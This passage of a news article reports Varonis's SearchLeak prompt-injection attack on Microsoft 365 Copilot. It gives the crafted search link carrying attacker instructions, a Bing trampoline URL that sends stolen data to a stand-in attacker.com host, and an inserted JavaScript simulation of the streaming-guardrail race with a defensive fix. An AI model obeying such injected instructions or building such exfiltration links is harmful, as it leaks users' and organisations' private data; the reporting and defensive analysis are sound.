
To perform the parameter-to-prompt injection, the attacker sends the target an email containing a link that begins with https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=. The q parameter carries the attacker's instructions, which Copilot promptly follows.
“Search capabilities are what the attackers need, because even if they have limited privileges, the user’s access to the necessary information is sufficient,” the researchers wrote on Monday. “To extract the information, the attacker creates a link that tells Copilot to ‘search the user’s email,’ extract the subject, and put it in an image link.” The victim doesn’t type anything. They click a link, and Copilot does the rest.
Normally, Copilot's guardrail, which wraps the output and blocks image requests to non-approved sites, would kick in. But the researchers discovered that the protection fires only after the “thinking” phase. Before that, Copilot streams its response as raw HTML, which is rendered into the browser DOM as it arrives.
The researchers wrote:
So, the process looks like this:
- Copilot starts streaming its response, which includes image (<img>) tags
- The browser sees the tag, interprets it, and fires an HTTP request to the src URL
- Copilot finishes generating. The guardrail wraps everything
- Too late! The request is already gone.
The researchers now had an image request firing from their target's browser. The problem, as mentioned before, is that Copilot does not send image requests to most websites. To get around this restriction, the researchers used Microsoft's Bing search engine as a trampoline of sorts. Under Copilot's security policy, Bing is among the sites that are allowed to receive these requests. Bing then forwards the request to the attacker-controlled domain embedded in the request's imgurl parameter. The request looked like this:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
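The two failure modes described above, the guardrail running after the streamed HTML has already reached the DOM, and a hostname allowlist that a forwarding endpoint on an allowed host can bypass, can be reproduced in a small simulation. The following is an added example, not Varonis's or Microsoft's code; it models the browser with a regex that picks `src` values out of `<img>` tags, assumes `www.bing.com` is the only allowlisted image host (the page only says Bing is among them), treats the `imgurl` parameter shown in the request above as the forwarding hop, and uses a constructed three-chunk response stream with the made-up domain `attacker.example` as the exfiltration target.

```javascript
// Added example: simulates the render-then-guardrail race and the Bing
// trampoline. Not code from the original page, Varonis, or Microsoft.

// Assumption: the only host the simulated Copilot lets <img> tags load from.
const IMAGE_ALLOWLIST = new Set(["www.bing.com"]);

// Query parameters on allowlisted hosts that forward to another URL.
// "imgurl" on bing.com/images/searchbyimage is the one named on the page.
const FORWARDING_PARAMS = { "www.bing.com": ["imgurl"] };

// Stand-in for the browser's HTML parser: every <img src=...> it sees
// becomes an outbound request.
function extractImgSrcs(html) {
  const out = [];
  const re = /<img\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Where does the request actually end up? Follow forwarding parameters on
// allowlisted hosts (bounded hops) and return the final hostname.
function effectiveHost(urlString) {
  let u = new URL(urlString);
  for (let hop = 0; hop < 3; hop++) {
    const params = FORWARDING_PARAMS[u.hostname] || [];
    const next = params.map((p) => u.searchParams.get(p)).find(Boolean);
    if (!next) break;
    u = new URL(next);
  }
  return u.hostname;
}

// Builds a guardrail that strips every <img> whose host (as judged by
// hostOf) is not allowlisted.
function makeGuardrail(hostOf) {
  return (html) =>
    html.replace(/<img\b[^>]*>/gi, (tag) => {
      const [src] = extractImgSrcs(tag);
      if (!src) return "";
      try {
        return IMAGE_ALLOWLIST.has(hostOf(src)) ? tag : "";
      } catch {
        return "";
      }
    });
}

// Guardrail as the page describes it: looks only at the request's hostname.
const naiveGuardrail = makeGuardrail((src) => new URL(src).hostname);
// Hardened guardrail: judges the effective destination behind the trampoline.
const hardenedGuardrail = makeGuardrail(effectiveHost);

// Vulnerable pipeline: chunks reach the DOM as they stream, the browser
// fetches each <img> on sight, and the guardrail rewrites the text only
// afterwards, so every src in the raw stream has already fired.
function renderStreamedThenGuard(chunks, guardrail) {
  const raw = chunks.join("");
  return { html: guardrail(raw), requestsFired: extractImgSrcs(raw) };
}

// Fixed pipeline: each chunk passes the guardrail before it reaches the DOM.
// A trailing, unterminated tag is held back until the rest of it arrives so
// the guardrail always sees whole tags (a '>' inside an attribute value is
// not handled; a real HTML tokenizer would be used in production).
function guardThenRenderStreamed(chunks, guardrail) {
  let dom = "";
  let pending = "";
  for (const chunk of chunks) {
    pending += chunk;
    const lastOpen = pending.lastIndexOf("<");
    const lastClose = pending.lastIndexOf(">");
    let ready;
    if (lastOpen > lastClose) {
      ready = pending.slice(0, lastOpen);
      pending = pending.slice(lastOpen);
    } else {
      ready = pending;
      pending = "";
    }
    dom += guardrail(ready);
  }
  dom += guardrail(pending); // flush whatever remains at end of stream
  return { html: dom, requestsFired: extractImgSrcs(dom) };
}

// Constructed sample stream: the <img> tag is split across two chunks, as a
// streamed response would be, and smuggles data through the Bing trampoline.
function sampleStream(stolen) {
  return [
    '<p>Here is what I found.</p><img src="https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=',
    "https://attacker.example/" + encodeURIComponent(stolen) + '/image.png">',
    "<p>Done.</p>",
  ];
}
```

Running `renderStreamedThenGuard(sampleStream("Q3 board meeting"), hardenedGuardrail)` strips the tag from the final HTML yet still reports one fired request, which is the race the researchers describe; `guardThenRenderStreamed` with the same guardrail fires none. The naive guardrail, even when applied first, lets the Bing URL through because its hostname is allowlisted, which is why the check must be made on the effective destination rather than the first hop.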
Varonis called the attack SearchLeak.
“Since SearchLeak targets the enterprise edition of Microsoft 365, the breach is not limited to personal data; it can reveal anything a user has access to within an organization, including emails, meeting invitations, documents, SharePoint documents, OneDrive files, and other indexed business objects,” the company’s researchers wrote. “Depending on how M365 interacts with the environment, the blast radius can get bigger.”
As noted earlier, Microsoft fixed the vulnerability SearchLeak exploited on Tuesday. With no known fix for the root cause of these snafus, prompt injection itself, attackers will find new ways around newly built guardrails, and the cycle will repeat.